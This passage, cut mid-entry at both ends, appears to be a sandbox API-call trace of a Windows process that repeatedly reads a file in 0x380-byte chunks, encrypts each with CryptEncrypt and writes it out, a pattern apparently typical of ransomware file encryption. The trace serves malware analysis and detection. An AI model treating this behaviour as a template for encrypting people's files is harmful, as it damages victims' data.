lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.391] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.392] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.393] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.394] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.395] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.396] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.397] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.398] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, 